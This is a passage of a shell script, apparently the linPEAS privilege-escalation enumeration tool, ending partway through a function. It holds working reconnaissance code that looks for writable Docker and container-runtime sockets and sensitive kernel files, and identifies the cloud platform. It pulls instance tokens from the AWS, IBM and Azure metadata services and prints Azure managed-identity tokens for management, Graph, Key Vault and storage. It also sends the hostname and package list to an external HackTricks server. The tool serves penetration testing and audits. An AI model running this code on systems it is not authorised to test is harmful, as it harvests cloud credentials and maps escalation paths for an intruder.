   2964   vmcoreinfo_readable="$( (head -n 1 /sys/kernel/vmcoreinfo > /dev/null && echo Yes) 2>/dev/null || echo No)"
   2965   security_present="$( (ls -l /sys/kernel/security > /dev/null && echo Yes) 2>/dev/null || echo No)"
   2966   security_writable="$([ -w /sys/kernel/security ] 2>/dev/null && echo Yes || echo No)"
   2967   efi_vars_writable="$([ -w /sys/firmware/efi/vars ] 2>/dev/null && echo Yes || echo No)"
   2968   efi_efivars_writable="$([ -w /sys/firmware/efi/efivars ] 2>/dev/null && echo Yes || echo No)"
   2969   proc_keys_readable="$( (head -n 1 /proc/keys > /dev/null && echo Yes) 2>/dev/null || echo No)"
   2970   proc_timer_list_readable="$( (head -n 1 /proc/timer_list > /dev/null && echo Yes) 2>/dev/null || echo No)"
   2971   sys_firmware_readable="$([ -r /sys/firmware ] 2>/dev/null && echo Yes || echo No)"
   2972   debugfs_present="$([ -d /sys/kernel/debug ] 2>/dev/null && echo Yes || echo No)"
   2973   debugfs_readable="$( (ls -la /sys/kernel/debug > /dev/null && echo Yes) 2>/dev/null || echo No)"
   2974   thermal_present="$([ -d /sys/class/thermal ] 2>/dev/null && echo Yes || echo No)"
   2975   thermal_readable="No"
   2976   for thermal_file in /sys/class/thermal/*/*; do
   2977     if [ -f "$thermal_file" ] && [ -r "$thermal_file" ]; then
   2978       thermal_readable="Yes"
   2979       break
   2980     fi
   2981   done
   2982 }
   2983 
   2984 checkContainerExploits() {
   2985   VULN_CVE_2019_5021="$(echo_no)"
   2986   if [ -f "/etc/alpine-release" ]; then
   2987     alpineVersion=$(cat /etc/alpine-release)
   2988     if [ "$(echo $alpineVersion | sed 's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360" ]; then
   2989       VULN_CVE_2019_5021="Yes"
   2990     fi
   2991   fi
   2992 }
   2993 
   2994 enumerateDockerSockets() {
   2995   dockerVersion="$(echo_not_found)"
   2996   if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then
   2997     SEARCHED_DOCKER_SOCKETS="1"
   2998     OLDIFS="$IFS"
   2999     IFS='
   3000 '
   3001     # NOTE: This is intentionally "lightweight" (checks common runtime socket names) and avoids
   3002     # pseudo filesystems (/sys, /proc) to reduce noise and latency.
   3003     for int_sock in $(find / \
   3004       -path "/sys" -prune -o \
   3005       -path "/proc" -prune -o \
   3006       -type s \( \
   3007         -name "docker.sock" -o \
   3008         -name "docker.socket" -o \
   3009         -name "cri-dockerd.sock" -o \
   3010         -name "dockershim.sock" -o \
   3011         -name "containerd.sock" -o \
   3012         -name "containerd.sock.ttrpc" -o \
   3013         -name "crio.sock" -o \
   3014         -name "podman.sock" -o \
   3015         -name "kubelet.sock" -o \
   3016         -name "buildkitd.sock" -o \
   3017         -name "buildkit.sock" -o \
   3018         -name "firecracker-containerd.sock" -o \
   3019         -name "frakti.sock" -o \
   3020         -name "rktlet.sock" \
   3021       \) -print 2>/dev/null); do
   3022       # Basic permissions hint (you generally need write perms to connect to a unix socket).
   3023       if [ -w "$int_sock" ]; then
   3024         if echo "$int_sock" | grep -Eq "docker"; then
   3025           echo "You have write permissions over Docker socket $int_sock" | sed -${E} "s,$int_sock,${SED_RED_YELLOW},g"
   3026         else
   3027           echo "You have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_RED},g"
   3028         fi
   3029       else
   3030         echo "You don't have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_GREEN},g"
   3031       fi
   3032       # Validate whether this looks like a Docker-compatible API socket (amicontained-style) when curl exists.
   3033       docker_enumerated=""
   3034       if [ "$(command -v curl 2>/dev/null || echo -n '')" ]; then
   3035         sockInfoResponse="$(curl -s --max-time 2 --unix-socket "$int_sock" http://localhost/info 2>/dev/null)"
   3036         if echo "$sockInfoResponse" | grep -q "ServerVersion"; then
   3037           echo "Valid Docker API socket: $int_sock" | sed -${E} "s,$int_sock,${SED_RED_YELLOW},g"
   3038           dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4)
   3039           echo "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
   3040           docker_enumerated="1"
   3041         fi
   3042       fi
   3043       # Fallback to docker CLI if curl is missing or the /info request didn't work.
   3044       # Use DOCKER_HOST so we can target non-default socket paths when possible.
   3045       if [ "$(command -v docker 2>/dev/null || echo -n '')" ] && ! [ "$docker_enumerated" ]; then
   3046         if [ -w "$int_sock" ] && echo "$int_sock" | grep -Eq "docker"; then
   3047           sockInfoResponse="$(DOCKER_HOST="unix://$int_sock" docker info 2>/dev/null)"
   3048           if [ "$sockInfoResponse" ]; then
   3049             dockerVersion=$(echo "$sockInfoResponse" | grep -i "^ Server Version:" | awk '{print $4}' | head -n 1)
   3050             printf "%s\n" "$sockInfoResponse" | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
   3051           fi
   3052         fi
   3053       fi
   3054     done
   3055     IFS="$OLDIFS"
   3056   fi
   3057 }
   3058 
   3059 containerCheck() {
   3060   inContainer=""
   3061   containerType="$(echo_no)"
   3062   # Are we inside docker?
   3063   if [ -f "/.dockerenv" ] ||
   3064     grep "/docker/" /proc/1/cgroup -qa 2>/dev/null ||
   3065     grep -qai docker /proc/self/cgroup  2>/dev/null ||
   3066     [ -f "/run/.dockerenv" ] ; then
   3067     inContainer="1"
   3068     containerType="docker\n"
   3069   fi
   3070   # Are we inside kubenetes?
   3071   if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null ||
   3072     grep -qai kubepods /proc/self/cgroup 2>/dev/null; then
   3073     inContainer="1"
   3074     if [ "$containerType" ]; then containerType="$containerType (kubernetes)\n"
   3075     else containerType="kubernetes\n"
   3076     fi
   3077   fi
   3078   # Inside concourse?
   3079   if grep "/concourse" /proc/1/mounts -qa 2>/dev/null; then
   3080     inContainer="1"
   3081     if [ "$containerType" ]; then 
   3082       containerType="$containerType (concourse)\n"
   3083     fi
   3084   fi
   3085   # Are we inside LXC?
   3086   if env | grep "container=lxc" -qa 2>/dev/null ||
   3087       grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then
   3088     inContainer="1"
   3089     if echo "$containerType" | grep -qv "lxc"; then
   3090       if [ "$containerType" ] && [ "$containerType" != "$(echo_no)" ]; then containerType="$containerType (lxc)\n"
   3091       else containerType="lxc\n"
   3092       fi
   3093     fi
   3094   fi
   3095   # Are we inside podman?
   3096   if [ -f "/run/.containerenv" ] ||
   3097       env | grep -qa "container=podman" 2>/dev/null ||
   3098       grep -qa "container=podman" /proc/1/environ 2>/dev/null; then
   3099     inContainer="1"
   3100     if echo "$containerType" | grep -qv "podman"; then
   3101       if [ "$containerType" ] && [ "$containerType" != "$(echo_no)" ]; then containerType="$containerType (podman)\n"
   3102       else containerType="podman\n"
   3103       fi
   3104     fi
   3105   fi
   3106   # Check for other container platforms that report themselves in PID 1 env
   3107   if [ -z "$inContainer" ]; then
   3108     if grep -qa 'container=' /proc/1/environ 2>/dev/null; then
   3109       inContainer="1"
   3110       containerType="$(tr '\000' '\n' < /proc/1/environ 2>/dev/null | awk -F= '/^container=/{print $2; exit}')\n"
   3111     fi
   3112   fi
   3113 }
   3114 
   3115 check_ibm_vm(){
   3116   is_ibm_vm="No"
   3117   if grep -q "nameserver 161.26.0.10" "/etc/resolv.conf" && grep -q "nameserver 161.26.0.11" "/etc/resolv.conf"; then
   3118     curl --connect-timeout 2  "http://169.254.169.254" > /dev/null 2>&1 || wget --timeout 2 --tries 1  "http://169.254.169.254" > /dev/null 2>&1
   3119     if [ "$?" -eq 0 ]; then
   3120       IBM_TOKEN=$( ( curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" -H "Metadata-Flavor: ibm" -H "Accept: application/json" 2> /dev/null | cut -d '"' -f4 ) || ( wget --tries 1 -O - --method PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" --header "Metadata-Flavor: ibm" --header "Accept: application/json" 2>/dev/null | cut -d '"' -f4 ) )
   3121       is_ibm_vm="Yes"
   3122     fi
   3123   fi
   3124 }
   3125 
   3126 check_az_automation_acc(){
   3127   is_az_automation_acc="No"
   3128   if env | grep -iq "azure" && env | grep -iq "AutomationServiceEndpoint"; then
   3129     is_az_automation_acc="Yes"
   3130   fi
   3131 }
   3132 
   3133 check_do(){
   3134   is_do="No"
   3135   if [ -f "/etc/cloud/cloud.cfg.d/90-digitalocean.cfg" ]; then
   3136     is_do="Yes"
   3137   fi
   3138 }
   3139 
   3140 check_tencent_cvm () {
   3141   is_tencent_cvm="No"
   3142   if grep -qi Tencent /etc/cloud/cloud.cfg 2>/dev/null; then
   3143       is_tencent_cvm="Yes"
   3144   fi
   3145 }
   3146 
   3147 check_aliyun_ecs(){
   3148   is_aliyun_ecs="No"
   3149   if [ -f "/etc/cloud/cloud.cfg.d/aliyun_cloud.cfg" ]; then 
   3150     is_aliyun_ecs="Yes"
   3151   fi
   3152 }
   3153 
   3154 check_aws_ec2(){
   3155   is_aws_ec2="No"
   3156   is_aws_ec2_beanstalk="No"
   3157   if [ -d "/var/log/amazon/" ]; then
   3158     is_aws_ec2="Yes"
   3159     EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
   3160   else
   3161     EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
   3162     if [ "$(echo $EC2_TOKEN | cut -c1-2)" = "AQ" ]; then
   3163       is_aws_ec2="Yes"
   3164     fi
   3165   fi
   3166   if [ "$is_aws_ec2" = "Yes" ] && grep -iq "Beanstalk" "/etc/motd"; then
   3167     is_aws_ec2_beanstalk="Yes"
   3168   fi
   3169 }
   3170 
   3171 check_aws_ecs(){
   3172   is_aws_ecs="No"
   3173   if (env | grep -q ECS_CONTAINER_METADATA_URI_v4); then
   3174     is_aws_ecs="Yes";
   3175     aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI_v4;
   3176     aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
   3177   elif (env | grep -q ECS_CONTAINER_METADATA_URI); then
   3178     is_aws_ecs="Yes";
   3179     aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI;
   3180     aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
   3181   elif (env | grep -q AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); then
   3182     is_aws_ecs="Yes";
   3183   fi
   3184   if [ "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ]; then
   3185     aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
   3186   fi
   3187 }
   3188 
   3189 check_aws_lambda(){
   3190   is_aws_lambda="No"
   3191   if (env | grep -q AWS_LAMBDA_); then
   3192     is_aws_lambda="Yes"
   3193   fi
   3194 }
   3195 
   3196 exec_with_jq(){
   3197   if [ "$(command -v jq || echo -n '')" ]; then 
   3198     $@ | jq 2>/dev/null;
   3199     if ! [ $? -eq 0 ]; then
   3200       $@;
   3201     fi
   3202    else 
   3203     $@;
   3204    fi
   3205 }
   3206 
   3207 check_aws_codebuild(){
   3208   is_aws_codebuild="No"
   3209   if [ -f "/codebuild/output/tmp/env.sh" ] && grep -q "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" "/codebuild/output/tmp/env.sh" ; then
   3210     is_aws_codebuild="Yes"
   3211   fi
   3212 }
   3213 
   3214 check_gcp(){
   3215   is_gcp_vm="No"
   3216   is_gcp_function="No"
   3217   if grep -q metadata.google.internal /etc/hosts 2>/dev/null || (curl --connect-timeout 2 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]); then
   3218     is_gcp_vm="Yes"
   3219   fi
   3220   # CHeck if /workspace exists
   3221   if [ -d "/workspace" ] && [ -d "/layers" ]; then
   3222     is_gcp_vm="No"
   3223     is_gcp_function="Yes"
   3224   fi
   3225 }
   3226 
   3227 check_az_vm(){
   3228   is_az_vm="No"
   3229   # 1. Check if the Azure log directory exists
   3230   if [ -d "/var/log/azure/" ]; then
   3231     is_az_vm="Yes"
   3232   # 2. Check if 'reddog.microsoft.com' is found in /etc/resolv.conf
   3233   elif grep -q "search reddog.microsoft.com" /etc/resolv.conf 2>/dev/null; then
   3234     is_az_vm="Yes"
   3235   else
   3236     # 3. Try querying the Azure Metadata Service for more wide support (e.g. Azure Container Registry tasks need this)
   3237     if type curl >/dev/null 2>&1; then
   3238       meta_response=$(curl -s --max-time 2 \
   3239         "http://169.254.169.254/metadata/identity/oauth2/token")
   3240       if echo "$meta_response" | grep -q "Missing"; then
   3241         is_az_vm="Yes"
   3242       fi
   3243     elif type wget >/dev/null 2>&1; then
   3244       meta_response=$(wget -qO- --timeout=2 \
   3245         "http://169.254.169.254/metadata/identity/oauth2/token")
   3246       if echo "$meta_response" | grep -q "Missing"; then
   3247         is_az_vm="Yes"
   3248       fi
   3249     fi
   3250   fi
   3251 }
   3252 
   3253 check_az_app(){
   3254   is_az_app="No"
   3255   if [ -d "/opt/microsoft" ] && env | grep -iq "azure"; then
   3256     is_az_app="Yes"
   3257   fi
   3258   if [ -n "$IDENTITY_ENDPOINT" ] && echo "$IDENTITY_ENDPOINT" | grep -q "/token" && [ -n "$IDENTITY_HEADER" ]; then
   3259     is_az_app="Yes"
   3260   fi
   3261 }
   3262 
   3263 set_azure_request_command() {
   3264   az_req=""
   3265   if [ "$(command -v curl || echo -n '')" ]; then
   3266       az_req="curl -s -f -L -H '$HEADER'"
   3267   elif [ "$(command -v wget || echo -n '')" ]; then
   3268       az_req="wget -q -O - --header '$HEADER'"
   3269   else
   3270       echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
   3271   fi
   3272 }
   3273 print_azure_identity_token() {
   3274   print_3title "$1" "T1552.005,T1580"
   3275   exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\\&resource=$2"
   3276   echo
   3277 }
   3278 print_azure_standard_identity_tokens() {
   3279   print_azure_identity_token "Management token" "https://management.azure.com/"
   3280   print_azure_identity_token "Graph token" "https://graph.microsoft.com/"
   3281   print_azure_identity_token "Vault token" "https://vault.azure.net/"
   3282   print_azure_identity_token "Storage token" "https://storage.azure.com/"
   3283 }
   3284 
   3285 print_ps(){
   3286   (ls -d /proc/*/ 2>/dev/null | while read f; do
   3287     CMDLINE=$(cat $f/cmdline 2>/dev/null | grep -av "seds,"); #Delete my own sed processess
   3288     if [ "$CMDLINE" ];
   3289       then var USER2=ls -ld $f | awk '{print $3}'; PID=$(echo $f | cut -d "/" -f3);
   3290       printf "  %-13s  %-8s  %s\n" "$USER2" "$PID" "$CMDLINE";
   3291     fi;
   3292   done) 2>/dev/null | sort -r
   3293 }
   3294 
   3295 linpeas_json_escape(){
   3296   printf "%s" "$1" | sed 's/\\/\\\\/g; s/"/\\"/g; s/	/ /g'
   3297 }
   3298 linpeas_os_release_field(){
   3299   [ -r /etc/os-release ] || return
   3300   awk -F= -v key="$1" '
   3301     $1 == key {
   3302       value=$0
   3303       sub(/^[^=]*=/, "", value)
   3304       gsub(/^"/, "", value)
   3305       gsub(/"$/, "", value)
   3306       print value
   3307       exit
   3308     }
   3309   ' /etc/os-release 2>/dev/null
   3310 }
   3311 linpeas_os_package_ecosystem(){
   3312   _os_id="$(linpeas_os_release_field ID)"
   3313   _os_version_id="$(linpeas_os_release_field VERSION_ID)"
   3314   _os_version_major="$(printf "%s" "$_os_version_id" | cut -d. -f1)"
   3315   case "$_os_id" in
   3316     debian)  [ "$_os_version_major" ] && printf "Debian:%s" "$_os_version_major" ;;
   3317     ubuntu)  [ "$_os_version_id" ] && printf "Ubuntu:%s" "$_os_version_id" ;;
   3318     alpine)  [ "$_os_version_id" ] && printf "Alpine:v%s" "$_os_version_id" ;;
   3319     fedora)  [ "$_os_version_id" ] && printf "Fedora:%s" "$_os_version_id" ;;
   3320     amzn)    [ "$_os_version_id" ] && printf "Amazon Linux:%s" "$_os_version_id" ;;
   3321     rhel)    [ "$_os_version_major" ] && printf "Red Hat:%s" "$_os_version_major" ;;
   3322     centos)  [ "$_os_version_major" ] && printf "CentOS:%s" "$_os_version_major" ;;
   3323     rocky)   [ "$_os_version_major" ] && printf "Rocky Linux:%s" "$_os_version_major" ;;
   3324     almalinux) [ "$_os_version_major" ] && printf "AlmaLinux:%s" "$_os_version_major" ;;
   3325   esac
   3326 }
   3327 linpeas_tabbed_packages_to_json_lines(){
   3328   awk -F '\t' -v manager="$1" -v ecosystem="$2" '
   3329     function esc(s) { gsub(/\\/,"\\\\",s); gsub(/"/,"\\\"",s); gsub(/\r/," ",s); return s }
   3330     $1 != "" && $2 != "" {
   3331       key=$1 "|" $2
   3332       if (seen[key]++) next
   3333       printf "{\"name\":\"%s\",\"version\":\"%s\",\"ecosystem\":\"%s\",\"manager\":\"%s\"}\n", esc($1), esc($2), esc(ecosystem), manager
   3334     }'
   3335 }
   3336 linpeas_print_package_json_lines(){
   3337   _ecosystem="$(linpeas_os_package_ecosystem)"
   3338   if command -v dpkg-query >/dev/null 2>&1; then
   3339     dpkg-query -W -f='${source:Package}\t${source:Version}\t${binary:Package}\t${Version}\n' 2>/dev/null | awk -F '\t' '
   3340       {
   3341         name=$1; version=$2
   3342         if (name == "" || name == "-") { name=$3; version=$4 }
   3343         if (version == "" || version == "-") { version=$4 }
   3344         sub(/^src:/, "", name)
   3345         if (name == "" || version == "") next
   3346         printf "%s\t%s\n", name, version
   3347       }' | linpeas_tabbed_packages_to_json_lines "dpkg" "$_ecosystem"
   3348   elif command -v rpm >/dev/null 2>&1; then
   3349     rpm -qa --qf '%{NAME}\t%{VERSION}-%{RELEASE}\n' 2>/dev/null | linpeas_tabbed_packages_to_json_lines "rpm" "$_ecosystem"
   3350   elif command -v apk >/dev/null 2>&1; then
   3351     apk info 2>/dev/null | while IFS= read -r _pkg_name; do
   3352       [ "$_pkg_name" ] || continue
   3353       _pkg_line="$(apk info -e -v "$_pkg_name" 2>/dev/null | head -n 1)"
   3354       _pkg_version="$(printf "%s" "$_pkg_line" | awk -v n="$_pkg_name" 'index($0, n "-") == 1 { print substr($0, length(n) + 2); exit }')"
   3355       [ "$_pkg_version" ] || continue
   3356       printf '{"name":"%s","version":"%s","ecosystem":"%s","manager":"apk"}\n' \
   3357         "$(linpeas_json_escape "$_pkg_name")" "$(linpeas_json_escape "$_pkg_version")" "$(linpeas_json_escape "$_ecosystem")"
   3358     done
   3359   elif command -v pacman >/dev/null 2>&1; then
   3360     pacman -Q 2>/dev/null | linpeas_tabbed_packages_to_json_lines "pacman" "$_ecosystem"
   3361   fi
   3362 }
   3363 linpeas_packages_json(){
   3364   _limit="${HACKTRICKS_PACKAGE_LIMIT:-300}"
   3365   linpeas_print_package_json_lines | awk -v max="$_limit" '
   3366     BEGIN { first=1; printf "[" }
   3367     NF {
   3368       if (count >= max) next
   3369       if (!first) printf ","
   3370       printf "%s", $0
   3371       first=0
   3372       count++
   3373     }
   3374     END { printf "]" }'
   3375 }
   3376 linpeas_os_json(){
   3377   _os_id="$(linpeas_os_release_field ID)"
   3378   _os_name="$(linpeas_os_release_field PRETTY_NAME)"
   3379   _os_version_id="$(linpeas_os_release_field VERSION_ID)"
   3380   _os_codename="$(linpeas_os_release_field VERSION_CODENAME)"
   3381   printf '{"id":"%s","name":"%s","version_id":"%s","codename":"%s","kernel":{"release":"%s","version":"%s","arch":"%s"}}' \
   3382     "$(linpeas_json_escape "$_os_id")" \
   3383     "$(linpeas_json_escape "$_os_name")" \
   3384     "$(linpeas_json_escape "$_os_version_id")" \
   3385     "$(linpeas_json_escape "$_os_codename")" \
   3386     "$(linpeas_json_escape "$(uname -r 2>/dev/null)")" \
   3387     "$(linpeas_json_escape "$(uname -v 2>/dev/null)")" \
   3388     "$(linpeas_json_escape "$(uname -m 2>/dev/null)")"
   3389 }
   3390 linpeas_host_checker_payload(){
   3391   _hostname="$(hostname 2>/dev/null)"
   3392   if [ "$ONLINE_VULN_CHECKS" ]; then
   3393     printf '{"hostname":"%s","source":"linpeas","version":"%s","online_package_check":true,"os":%s,"packages":%s}' \
   3394       "$(linpeas_json_escape "$_hostname")" \
   3395       "$(linpeas_json_escape "$VERSION")" \
   3396       "$(linpeas_os_json)" \
   3397       "$(linpeas_packages_json)"
   3398   else
   3399     printf '{"hostname":"%s","source":"linpeas","version":"%s"}' \
   3400       "$(linpeas_json_escape "$_hostname")" \
   3401       "$(linpeas_json_escape "$VERSION")"
   3402   fi
   3403 }
   3404 linpeas_start_host_checker_lookup(){
   3405   [ "$NOT_CHECK_EXTERNAL_HOSTNAME" ] && return
   3406   [ "$LINPEAS_HOST_CHECKER_STARTED" ] && return
   3407   INTERNET_SEARCH_TIMEOUT=15
   3408   LINPEAS_HOST_CHECKER_STARTED="1"
   3409   LINPEAS_HOST_CHECKER_OUT="${TMPDIR:-/tmp}/linpeas_host_checker_$$.json"
   3410   LINPEAS_HOST_CHECKER_ERR="${TMPDIR:-/tmp}/linpeas_host_checker_$$.err"
   3411   _hacktricks_host_checker_url="${HACKTRICKS_HOST_CHECKER_URL:-https://tools.hacktricks.wiki/api/host-checker}"
   3412   _hacktricks_payload="$(linpeas_host_checker_payload)"
   3413   if command -v curl >/dev/null 2>&1; then
   3414     (curl -s "$_hacktricks_host_checker_url" -H "User-Agent: linpeas" --data-binary "$_hacktricks_payload" -H "Content-Type: application/json" --max-time "$INTERNET_SEARCH_TIMEOUT" > "$LINPEAS_HOST_CHECKER_OUT" 2>"$LINPEAS_HOST_CHECKER_ERR") &
   3415     LINPEAS_HOST_CHECKER_PID=$!
   3416   elif command -v wget >/dev/null 2>&1; then
   3417     (wget -q -O - "$_hacktricks_host_checker_url" --header "User-Agent: linpeas" --header "Content-Type: application/json" --post-data "$_hacktricks_payload" --timeout "$INTERNET_SEARCH_TIMEOUT" > "$LINPEAS_HOST_CHECKER_OUT" 2>"$LINPEAS_HOST_CHECKER_ERR") &
   3418     LINPEAS_HOST_CHECKER_PID=$!
   3419   else
   3420     printf '{"error":"wget or curl not found"}\n' > "$LINPEAS_HOST_CHECKER_OUT"
   3421   fi
   3422 }
   3423 linpeas_wait_host_checker_lookup(){
   3424   [ "$NOT_CHECK_EXTERNAL_HOSTNAME" ] && return 1
   3425   linpeas_start_host_checker_lookup
   3426   if [ "$LINPEAS_HOST_CHECKER_PID" ]; then
   3427     wait "$LINPEAS_HOST_CHECKER_PID" 2>/dev/null
   3428     LINPEAS_HOST_CHECKER_PID=""
   3429   fi
   3430   [ -s "$LINPEAS_HOST_CHECKER_OUT" ]
   3431 }
   3432 linpeas_strip_package_vulns_from_host_response(){
   3433   if command -v jq >/dev/null 2>&1; then
   3434     jq 'del(.package_vulnerabilities)' "$LINPEAS_HOST_CHECKER_OUT" 2>/dev/null && return
   3435   fi
   3436   awk '
   3437     function brace_delta(s, t, opens, closes) {
   3438       t=s; opens=gsub(/{/,"{",t)
   3439       t=s; closes=gsub(/}/,"}",t)
   3440       return opens - closes
   3441     }
   3442     skip {
   3443       depth += brace_delta($0)
   3444       if (depth <= 0) skip=0
   3445       next
   3446     }
   3447     /"package_vulnerabilities"[[:space:]]*:/ {
   3448       sub(/,[[:space:]]*$/, "", prev)
   3449       skip=1
   3450       depth=brace_delta($0)
   3451       if (depth <= 0) skip=0
   3452       next
   3453     }
   3454     {
   3455       if (have) print prev
   3456       prev=$0
   3457       have=1
   3458     }
   3459     END {
   3460       if (have) print prev
   3461     }
   3462   ' "$LINPEAS_HOST_CHECKER_OUT"
   3463 }
   3464 check_external_hostname(){
   3465   if linpeas_wait_host_checker_lookup; then
   3466     linpeas_strip_package_vulns_from_host_response
   3467   else
   3468     echo "HackTricks host checker did not return data"
   3469   fi
   3470 }
   3471 linpeas_print_package_vulnerabilities_with_jq(){
   3472   jq -r '
   3473     .package_vulnerabilities as $pv
   3474     | if ($pv == null) then
   3475         empty
   3476       elif (($pv.affected // 0) | tonumber) == 0 then
   3477         "No vulnerable packages found by online lookup (checked \($pv.checked // 0) packages)."
   3478       else
   3479         "Online package vulnerabilities found: \($pv.affected) vulnerable package(s), checked \($pv.checked // 0).",
   3480         (
   3481           $pv.vulnerable_packages[:50][]?
   3482           | "- \(.name // "?") \(.version // "?") [\(.ecosystem // "unknown")]: \((.vulns // []) | join(", "))"
   3483         ),
   3484         (
   3485           if (($pv.vulnerable_packages | length) > 50) then
   3486             "... \((($pv.vulnerable_packages | length) - 50)) more vulnerable package(s) not shown."
   3487           else empty end
   3488         )
   3489       end
   3490   ' "$LINPEAS_HOST_CHECKER_OUT" 2>/dev/null
   3491 }
   3492 linpeas_print_package_vulnerabilities_with_awk(){
   3493   awk '
   3494     function json_value(line) {
   3495       sub(/^[^:]*:[[:space:]]*"/, "", line)
   3496       sub(/",?[[:space:]]*$/, "", line)
   3497       return line
   3498     }
   3499     function json_number(line) {
   3500       sub(/^[^:]*:[[:space:]]*/, "", line)
   3501       sub(/,?[[:space:]]*$/, "", line)
   3502       return line
   3503     }
   3504     function json_string(line) {
   3505       sub(/^[[:space:]]*"/, "", line)
   3506       sub(/",?[[:space:]]*$/, "", line)
   3507       return line
   3508     }
   3509     function flush_pkg() {
   3510       if (name != "" && version != "") {
   3511         total++
   3512         if (shown < 50) {
   3513           print "- " name " " version " [" (ecosystem != "" ? ecosystem : "unknown") "]: " vulns
   3514           shown++
   3515         }
   3516       }
   3517       name=""; version=""; ecosystem=""; vulns=""; in_vulns=0
   3518     }
   3519     /"package_vulnerabilities"[[:space:]]*:/ { in_pv=1; next }
   3520     in_pv && /"checked"[[:space:]]*:/ { checked=json_number($0); next }
   3521     in_pv && /"affected"[[:space:]]*:/ { affected=json_number($0); next }
   3522     in_pv && /"vulnerable_packages"[[:space:]]*:[[:space:]]*\[/ { in_pkgs=1; next }
   3523     in_pkgs && /"name"[[:space:]]*:/ { name=json_value($0); next }
   3524     in_pkgs && /"version"[[:space:]]*:/ { version=json_value($0); next }
   3525     in_pkgs && /"ecosystem"[[:space:]]*:/ { ecosystem=json_value($0); next }
   3526     in_pkgs && /"vulns"[[:space:]]*:[[:space:]]*\[/ { in_vulns=1; next }
   3527     in_vulns && /"/ {
   3528       v=json_string($0)
   3529       if (v != "") vulns = vulns (vulns != "" ? ", " : "") v
   3530       next
   3531     }
   3532     in_vulns && /\]/ { in_vulns=0; next }
   3533     in_pkgs && /^[[:space:]]*}[,]?[[:space:]]*$/ { flush_pkg(); next }
   3534     END {
   3535       if (affected == "") exit
   3536       if ((affected + 0) == 0) {
   3537         print "No vulnerable packages found by online lookup (checked " (checked != "" ? checked : 0) " packages)."
   3538       } else {
   3539         print "Online package vulnerabilities found: " affected " vulnerable package(s), checked " (checked != "" ? checked : 0) "."
   3540         if (total > 50) print "... " (total - 50) " more vulnerable package(s) not shown."
   3541       }
   3542     }
   3543   ' "$LINPEAS_HOST_CHECKER_OUT" | awk '
   3544     /^Online package vulnerabilities found:/ { header=$0; next }
   3545     /^No vulnerable packages found/ { print; next }
   3546     /^\.\.\. / { more=$0; next }
   3547     /^- / { lines[++count]=$0; next }
   3548     END {
   3549       if (header) print header
   3550       for (i=1; i<=count && i<=50; i++) print lines[i]
   3551       if (more) print more
   3552     }
   3553   '
   3554 }
   3555 linpeas_print_package_vulnerabilities(){
   3556   [ "$ONLINE_VULN_CHECKS" ] || return
   3557   if ! linpeas_wait_host_checker_lookup; then
   3558     echo "Online package vulnerability lookup did not return data"
   3559     return
   3560   fi
   3561   if command -v jq >/dev/null 2>&1; then
   3562     linpeas_print_package_vulnerabilities_with_jq | sed -${E} "s,CVE-[0-9]{4}-[0-9]+,${SED_RED_YELLOW},g"
   3563   else
   3564     linpeas_print_package_vulnerabilities_with_awk | sed -${E} "s,CVE-[0-9]{4}-[0-9]+,${SED_RED_YELLOW},g"
   3565   fi
   3566 }
   3567 
   3568 check_dns(){
   3569   local TIMEOUT_INTERNET_SECONDS_DNS=$1
   3570   if ! [ -f "/bin/bash" ]; then
   3571     echo "  /bin/bash not found"
   3572     return
   3573   fi
   3574   # example.com
   3575   (bash -c '((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS accessible") | grep "accessible" && exit 0 ) 2>/dev/null || echo "DNS is not accessible"') & local_pid=$!
   3576   sleep $TIMEOUT_INTERNET_SECONDS_DNS && kill -9 $local_pid 2>/dev/null && echo "DNS is not accessible"
   3577 }
   3578 
   3579 check_tcp_80(){
   3580   local TIMEOUT_INTERNET_SECONDS_80=$1
   3581   if ! [ -f "/bin/bash" ]; then
   3582     echo "  /bin/bash not found"
   3583     return
   3584   fi
   3585   # example.com
